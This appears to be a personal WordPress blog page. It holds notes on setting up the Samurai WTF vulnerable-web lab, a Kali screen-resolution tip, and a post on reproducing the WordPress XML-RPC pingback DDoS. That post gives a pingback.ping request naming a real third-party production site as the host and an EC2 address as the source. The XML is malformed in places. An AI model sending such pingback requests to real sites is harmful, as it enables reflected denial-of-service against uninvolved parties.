Category: Uncategorized

Samurai WTF

Download and install Samurai for VMWARE Workstation (https://sourceforge.net/projects/samurai/files/)

Unzip and double click on the *.vmx file

Default Username/password: samurai/samurai

Samurai has vulnerable websites:

  • Dojo-Basics
  • BwAPPs
  • DVWA
  • Mutillidae

Allow network access to the them by modifying the *.conf files which can be found /etc/apache2/sites-available.

To open the file use this command: sudo gedit bwapp.conf

Check to see which services are running on which ports by using this command: grep -ri listen /etc/apache2

Modify the IP address from <IP>:<port> to *.<port>

Save the files

Restart Apache using this command: /etc/init.d/apache2 restart

This error means more than one service is running on the same ports

 

Change Resolution size in Kali using Command Line

To change the screen resolution in Kali using the Terminal type

xrandr

 

Then choose your desired dimension by typing

xrandr 1280×768

WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress.  I am going to show how to create a request to recreate the attack.  The attack send upwards of 400 Gbps through the internet. By comparison you’re home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.

 

I created the request in BURP PROXY:

Capture (1)

POST /xmlrpc.php HTTP/1.0
Host: https://prod.nestle-hcp.com.au/breastfeeding/
Content-Type: text/xml
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://ec2-107-22-52-34.compute-1.amazonaws.com</string></value>
</param>
<param>
<value>
<string>https://prod.nestle-hcp.com.au/?p=45</script>
<value>
</param>
<params>
</methodCall>

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!